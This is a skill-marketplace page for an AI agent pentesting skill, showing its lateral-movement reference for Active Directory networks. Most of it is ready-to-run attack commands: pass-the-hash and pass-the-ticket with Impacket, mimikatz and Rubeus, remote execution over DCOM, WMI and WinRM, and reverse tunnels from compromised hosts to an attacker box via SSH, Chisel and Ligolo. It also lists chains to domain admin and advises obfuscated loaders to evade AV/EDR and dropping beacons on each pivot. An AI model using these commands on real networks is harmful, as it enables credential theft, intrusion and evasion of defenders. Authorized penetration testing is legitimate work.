All skills
hardw00t avatar

/network-pentest

@f9bb3b2

Internal network and Active Directory penetration testing skill for corporate environments. Use when performing authorized internal network assessments, AD attack path analysis, lateral movement, privilege escalation, and post-exploitation across Windows/Linux estates. Covers BloodHound, Impacket, NetExec/CrackMapExec, Responder, Rubeus, mimikatz, certipy. Triggers on requests to pentest internal networks, attack AD, perform lateral movement, Kerberoast, DCSync, or escalate privileges.

Use this Skill: https://skilld.dev/gh/hardw00t/ai-security-arsenal/network-pentest

This session only. Nothing lands on disk.

referenceslateral_movement.md

≈1.4k tokens on demand. Your agent reads this file only when SKILL.md points to it.

Lateral Movement Reference

Techniques for moving between hosts given a credential material foothold. Chosen execution method affects stealth, logging artefacts, and whether a privileged shell is obtained.

Credential forms

Form Usable with
Cleartext password Everything
NT hash PtH (SMB, WinRM, LDAP via NTLM), Rubeus asktgt, overpass
AES256 key Kerberos TGT via getTGT / Rubeus
TGT (.ccache / .kirbi) PtT via KRB5CCNAME, Rubeus ptt
TGS PtT for specific SPN
DPAPI master key Decrypt stored browser/RDP credentials

Pass-the-Hash (PtH)

# Impacket family (SMB)
psexec.py domain.local/admin@target -hashes :NTHASH
wmiexec.py domain.local/admin@target -hashes :NTHASH      # quieter
smbexec.py domain.local/admin@target -hashes :NTHASH
atexec.py  domain.local/admin@target -hashes :NTHASH "whoami"

# NetExec
nxc smb targets.txt -u admin -H :NTHASH --local-auth -x "whoami"

# WinRM
evil-winrm -i target -u admin -H NTHASH

# Mimikatz (spawn a process with injected NTLM)
mimikatz.exe "sekurlsa::pth /user:admin /domain:domain.local /ntlm:HASH /run:cmd.exe"

Key note: PtH works against SMB/WinRM/MSRPC but not against Kerberos-only services. For Kerberos targets, upgrade to overpass-the-hash to obtain a TGT.

Pass-the-Ticket (PtT)

# Linux: set KRB5CCNAME and go
export KRB5CCNAME=$(pwd)/admin.ccache
psexec.py -k -no-pass domain.local/admin@target
smbclient -k //target/C$

# Windows: import kirbi with mimikatz or Rubeus
mimikatz.exe "kerberos::ptt ticket.kirbi" exit
Rubeus.exe ptt /ticket:ticket.kirbi

Overpass-the-Hash (hash -> TGT)

# Rubeus (on target / owned host)
Rubeus.exe asktgt /user:admin /rc4:NTHASH /ptt
Rubeus.exe asktgt /user:admin /aes256:AESKEY /ptt

# Impacket (offline)
getTGT.py domain.local/admin -hashes :NTHASH -dc-ip 10.0.0.1
export KRB5CCNAME=$(pwd)/admin.ccache

DCOM execution

DCOM lateral movement avoids service creation (no 7045), and some variants avoid SMB entirely.

# Impacket dcomexec — objects: MMC20, ShellWindows, ShellBrowserWindow
dcomexec.py -object MMC20 domain.local/admin:pass@target
dcomexec.py -object ShellWindows domain.local/admin@target -hashes :NTHASH
# Native PowerShell DCOM
$com = [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application","target"))
$com.Document.ActiveView.ExecuteShellCommand("cmd.exe", $null, "/c calc.exe", "7")

Detection: unusual parent-child (mmc.exe -> cmd.exe), Windows Event 10000-range, Sysmon EID 1.

WMI execution

# Impacket (DCERPC over TCP/135 + high port)
wmiexec.py domain.local/admin:pass@target

# NetExec
nxc wmi target -u admin -p 'pass' -x 'whoami'
# Native: Invoke-WmiMethod / Win32_Process.Create
Invoke-WmiMethod -ComputerName target -Class Win32_Process -Name Create \
  -ArgumentList "powershell -enc <b64>" -Credential $cred

WinRM / PowerShell Remoting

evil-winrm -i target -u user -p 'pass'
evil-winrm -i target -u user -H NTHASH
nxc winrm target -u user -p 'pass' -X '$PSVersionTable'
Enter-PSSession -ComputerName target -Credential (Get-Credential)
Invoke-Command -ComputerName target -ScriptBlock { whoami } -Credential $c

WinRM listens on 5985/5986. GPO-controlled; presence of TrustedHosts config is a strong pivot signal.

SSH pivoting

# Local port forward — expose remote 3306 on our 33306
ssh -L 33306:internal-db:3306 user@jump.target

# Dynamic SOCKS proxy (use with proxychains for tool chaining)
ssh -D 1080 user@jump.target
# /etc/proxychains.conf: socks5 127.0.0.1 1080
proxychains nxc smb 10.10.10.0/24 -u alice -p 'Summer2026!'

# Remote port forward — pull internal port to attacker box
ssh -R 4444:localhost:4444 user@attacker.box

# ProxyJump chain (multi-hop)
ssh -J user1@jump1,user2@jump2 user3@final-target

SMB/named-pipe pivoting (Windows)

# Ligolo-ng (preferred modern pivot)
# On attacker: ./proxy -selfcert
# On compromised host: ./agent -connect attacker:11601
sudo ip tuntap add user root mode tun ligolo
sudo ip link set ligolo up
sudo ip route add 10.10.10.0/24 dev ligolo
# Now attacker tools route transparently through compromised host

# Chisel (reverse SOCKS over HTTP)
# server: chisel server -p 8000 --reverse
# client: chisel client attacker:8000 R:socks

Chain patterns (observed)

  1. LLMNR -> Kerberoast -> DA: capture NTLMv2, crack, query SPNs as low-priv user, crack svc hash, reuse on local admin, DCSync.
  2. PtH cluster sweep: local admin hash on WS image -> nxc sweep -> find DA session -> mimikatz -> DCSync.
  3. RBCD from MAQ: low-priv user -> addcomputer -> write msDS-AllowedToActOnBehalfOfOtherIdentity on target server -> getST impersonate DA -> PSExec.
  4. ADCS ESC8 via coercion: PetitPotam DC$ -> ntlmrelayx to http CA -> DC cert -> DCSync.

Safety & stealth

  • Prefer WMI/DCOM over psexec when engagement calls for evasion — no service creation event.
  • Rubeus/mimikatz on the wire trigger AV/EDR — use obfuscated loaders or run via legitimate signed tools (e.g., GetTGT.py from Linux hop).
  • Each pivot is an opportunity to drop a beacon — keep an inventory per host for cleanup.
  • Clean up imported tickets: klist purge (Windows) / kdestroy -A (Linux).

Tool versions validated

  • impacket >= 0.12
  • NetExec >= 1.3
  • Rubeus >= 2.3
  • evil-winrm >= 3.7
  • ligolo-ng >= 0.7
  • chisel >= 1.9

Source: SKILL.md on GitHub

1 alert16d4 checks · Risk SAFE
  • Gen Agent Trust Hub16d

    The network-pentest skill is a highly structured, well-documented resource designed for authorized internal network and Active Directory penetration testing workflows. It provides clear playbooks, references, and configuration templates for using industry-standard security tools. No malicious behaviors, obfuscation techniques, or unauthorized data exfiltration paths were detected.

  • Socket16d

    13 alerts: gptSecurity, gptAnomaly

  • Snyk16d

    Risk: LOW · No issues

  • Runlayer7mo

    1/1 file flagged

Signed by skilld at f9bb3b2. This ties the file your Agent reads to that commit on GitHub. It does not review the instructions.

Last checked against GitHub 2 months ago.

Steadyupdated 6 months ago

README badge

README badge for hardw00t/ai-security-arsenal/network-pentest